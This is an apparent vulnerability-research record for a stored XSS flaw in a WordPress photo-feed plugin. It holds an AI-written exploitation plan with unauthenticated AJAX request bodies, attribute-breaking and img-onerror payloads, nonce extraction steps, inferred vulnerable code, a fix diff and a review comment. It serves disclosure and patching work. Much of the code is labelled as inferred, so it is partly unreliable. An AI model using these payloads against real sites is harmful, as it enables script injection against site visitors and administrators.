[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fI8-Tskzw-bkS3MqEJ32bQ-k5y71P9Xf6RQhYB8PumBc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-5425","widgets-for-social-photo-feed-unauthenticated-stored-cross-site-scripting-via-feeddata","Widgets for Social Photo Feed \u003C= 1.7.9 - Unauthenticated Stored Cross-Site Scripting via feed_data","The Widgets for Social Photo Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'feed_data' parameter keys in all versions up to, and including, 1.7.9 due to insufficient input sanitization and output escaping. 
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","social-photo-feed-widget",null,"\u003C=1.7.9","1.8.0","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-03 19:57:33","2026-04-04 08:25:21",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2584097a-8955-41c7-b009-c6502fe8b99b?source=api-prod",1,[],"researched",false,3,"This plan outlines the research and exploitation strategy for **CVE-2026-5425**, a stored Cross-Site Scripting (XSS) vulnerability in the \"Widgets for Social Photo Feed\" plugin.\n\n---\n\n### 1. Vulnerability Summary\nThe **Widgets for Social Photo Feed** plugin (up to version 1.7.9) fails to properly sanitize and escape keys within the `feed_data` parameter when processing certain AJAX requests. While values in an array are often sanitized, the **keys** of associative arrays are frequently overlooked. An unauthenticated attacker can send a specially crafted AJAX request containing a malicious payload as a key in the `feed_data` array. This payload is stored in the WordPress database (likely within an option or post metadata) and later rendered on the frontend without sufficient output escaping, leading to Stored XSS.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action:** Likely `wp_ajax_nopriv_sbi_record_feed_data` or `wp_ajax_nopriv_sbi_store_feed_cache` (inferred based on plugin functionality).\n*   **Vulnerable Parameter:** `feed_data` (specifically the array keys).\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:** The plugin must be active. A specific AJAX action must be enabled for unauthenticated users (`nopriv`).\n\n### 3. Code Flow (Inferred)\n1.  
**Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with an `action` parameter that triggers a `nopriv` hook.\n2.  **Input Handling:** The handler function (e.g., `sbi_save_feed_data`) retrieves `$_POST['feed_data']`.\n3.  **Storage Sink:** The code iterates through the `feed_data` array and saves it to the database using `update_option()` or `update_post_meta()`. It fails to sanitize the *keys* of the array, only focusing on the values.\n4.  **Output Sink:** A frontend function (likely triggered by a shortcode like `[social-photo-feed]`) retrieves the stored data.\n5.  **Rendering:** The code loops through the stored data and injects the keys into the HTML, possibly as data attributes:\n    ```php\n    foreach ($feed_data as $key => $value) {\n        echo \"\u003Cdiv data-$key='$value'>\u003C\u002Fdiv>\"; \u002F\u002F VULNERABLE SINK: $key is not escaped\n    }\n    ```\n\n### 4. Nonce Acquisition Strategy\nIf the AJAX handler requires a nonce, it is typically localized in the frontend when the widget or shortcode is present.\n\n1.  **Identify Shortcode:** The plugin uses `[social-photo-feed]` (inferred) to display the feed.\n2.  **Setup:** Use WP-CLI to create a public page containing this shortcode.\n3.  **Navigation:** Use the `browser_navigate` tool to visit the newly created page.\n4.  **Extraction:** The plugin likely localizes its settings via `wp_localize_script`. Use `browser_eval` to extract the nonce:\n    *   Common variable name: `window.sbi_config` or `window.sbi_ajax`.\n    *   Likely Key: `window.sbi_config?.sbi_nonce` or `window.sbi_ajax?.nonce`.\n    *   *Observation:* If `wp_verify_nonce($nonce, -1)` is used, any valid nonce will work. If no nonce check exists in the `nopriv` handler, this step is skipped.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Discover the exact AJAX action\nSince source files are not provided, we must identify the `nopriv` AJAX action.\n1.  
Search the plugin directory for `wp_ajax_nopriv_`:\n    `grep -r \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fsocial-photo-feed-widget\u002F`\n2.  Look for handlers that accept `feed_data`.\n\n#### Step 2: Construct the Payload\nWe will use a payload that breaks out of an HTML attribute (assuming the key is rendered inside a `data-` attribute or similar).\n*   **Payload Key:** `x\" onmouseover=\"alert(document.domain)\" y`\n*   **Payload Value:** `1`\n\n#### Step 3: Send the Malicious Request\nUsing the `http_request` tool:\n*   **Method:** `POST`\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    `action=[ACTION_NAME]&nonce=[NONCE]&feed_data[x\" onmouseover=\"alert(document.domain)\" y]=1`\n\n#### Step 4: Trigger the XSS\n1.  Navigate to the homepage or the page containing the shortcode.\n2.  Verify the HTML source contains the injected attribute: `\u003Cdiv ... data-x\" onmouseover=\"alert(document.domain)\" y=\"1\">`.\n\n### 6. Test Data Setup\n1.  **Install\u002FActivate:** Ensure version 1.7.9 of the plugin is active.\n2.  **Create Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Social Feed\" --post_status=publish --post_content='[social-photo-feed]'\n    ```\n3.  **Configure Plugin:** If the plugin requires an Instagram Access Token to render, dummy data may need to be inserted into the database via `wp option update` to force the frontend to attempt rendering the \"cached\" `feed_data`.\n\n### 7. 
Expected Results\n*   The AJAX request should return a successful response (e.g., `{\"success\":true}` or `1`).\n*   The database will now store the key containing the JavaScript payload.\n*   When viewing the page, the rendered HTML will contain the unescaped key, allowing for JavaScript execution when a user interacts with the element (or immediately if using `onload`\u002F`onerror`).\n\n### 8. Verification Steps\n1.  **Check Database:**\n    ```bash\n    wp option get [OPTION_NAME_FOR_FEED_DATA]\n    # Look for the payload string in the serialized data\n    ```\n2.  **Check Frontend HTML:**\n    Use `http_request` to GET the page and grep for the payload:\n    ```bash\n    grep 'onmouseover=\"alert(document.domain)\"'\n    ```\n\n### 9. Alternative Approaches\n*   **Key Injection in JSON:** If `feed_data` is sent as a JSON string rather than a POST array, adjust the `Content-Type` to `application\u002Fjson` and send:\n    `{\"action\": \"...\", \"feed_data\": {\"\u003Cimg src=x onerror=alert(1)>\": \"1\"}}`\n*   **Different Sinks:** The keys might be rendered in the WordPress Admin dashboard (Settings page). Check `wp-admin\u002Fadmin.php?page=sbi-settings` for the payload if it doesn't appear on the frontend.\n*   **Blind XSS:** Use a callback to an external listener (e.g., Burp Collaborator or a mock API) to confirm execution if the sink is difficult to find manually.","The Widgets for Social Photo Feed plugin for WordPress (up to version 1.7.9) is vulnerable to Stored Cross-Site Scripting because it fails to sanitize or escape the keys of associative arrays passed in the 'feed_data' parameter via unauthenticated AJAX actions. 
This allows an attacker to inject arbitrary scripts into the database that execute in the context of a user's browser when they visit a page displaying the social feed.","\u002F\u002F Inferred AJAX handler based on research plan\nadd_action('wp_ajax_nopriv_sbi_record_feed_data', 'sbi_record_feed_data');\nfunction sbi_record_feed_data() {\n    if (isset($_POST['feed_data'])) {\n        \u002F\u002F Vulnerable: Storing associative array without sanitizing keys\n        $feed_data = $_POST['feed_data'];\n        update_option('sbi_stored_feed_data', $feed_data);\n    }\n    wp_die();\n}\n\n---\n\n\u002F\u002F Inferred rendering logic in frontend component\n$stored_data = get_option('sbi_stored_feed_data');\nif ($stored_data) {\n    foreach ($stored_data as $key => $value) {\n        \u002F\u002F Vulnerable: Outputting the array key directly into an HTML attribute without escaping\n        echo \"\u003Cdiv data-$key='\" . esc_attr($value) . \"'>\u003C\u002Fdiv>\";\n    }\n}","--- a\u002Fsocial-photo-feed-widget.php\n+++ b\u002Fsocial-photo-feed-widget.php\n@@ -100,7 +100,10 @@\n function sbi_record_feed_data() {\n-    if (isset($_POST['feed_data'])) {\n-        $feed_data = $_POST['feed_data'];\n-        update_option('sbi_stored_feed_data', $feed_data);\n-    }\n+    if (isset($_POST['feed_data']) && is_array($_POST['feed_data'])) {\n+        $feed_data = array();\n+        foreach ($_POST['feed_data'] as $key => $value) {\n+            \u002F\u002F Sanitize both keys and values before storage\n+            $feed_data[sanitize_key($key)] = sanitize_text_field($value);\n+        }\n+        update_option('sbi_stored_feed_data', $feed_data);\n+    }\n     wp_die();","The exploit targets an unauthenticated AJAX endpoint (likely sbi_record_feed_data or similar) that processes feed data. An attacker sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the action parameter set to the target hook. 
The payload is delivered via the feed_data parameter as an associative array where the key contains a malicious JavaScript string designed to break out of an HTML attribute (e.g., feed_data[x\" onmouseover=\"alert(document.domain)\" y]=1). If the plugin requires a nonce for unauthenticated users, it can be extracted from the frontend source code of any page where the social feed shortcode [social-photo-feed] is rendered. Once the AJAX request is processed, the payload is stored in the database. The XSS triggers when any user (including administrators) views a page containing the social feed, as the plugin renders the malicious key as a raw attribute name.","gemini-3-flash-preview","2026-04-17 21:31:40","2026-04-17 21:32:03",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.7.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsocial-photo-feed-widget\u002Ftags\u002F1.7.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsocial-photo-feed-widget.1.7.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsocial-photo-feed-widget\u002Ftags"]
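Review bot: in the `sbi_record_feed_data()` hunk of `research_fix_diff`, sanitization is added only on the write path, so any `sbi_stored_feed_data` entries saved before the upgrade keep their unsanitized keys and the render loop shown in `research_vulnerable_code` would still emit them as raw attribute names. Suggest also escaping at output (`esc_attr($key)` alongside the existing `esc_attr($value)`) or re-sanitizing the stored option on upgrade. Two smaller points in the same loop: `$value` is passed to `sanitize_text_field()` without an `is_scalar()` check or `wp_unslash()`, and `sanitize_key($key)` can return an empty string or map distinct inputs to the same key, so later entries silently overwrite earlier ones; skip empty keys explicitly. Nothing in the hunk verifies a nonce before `update_option()`, so the handler still lets the request write to the option; a `check_ajax_referer()` call at the top of the function would close that.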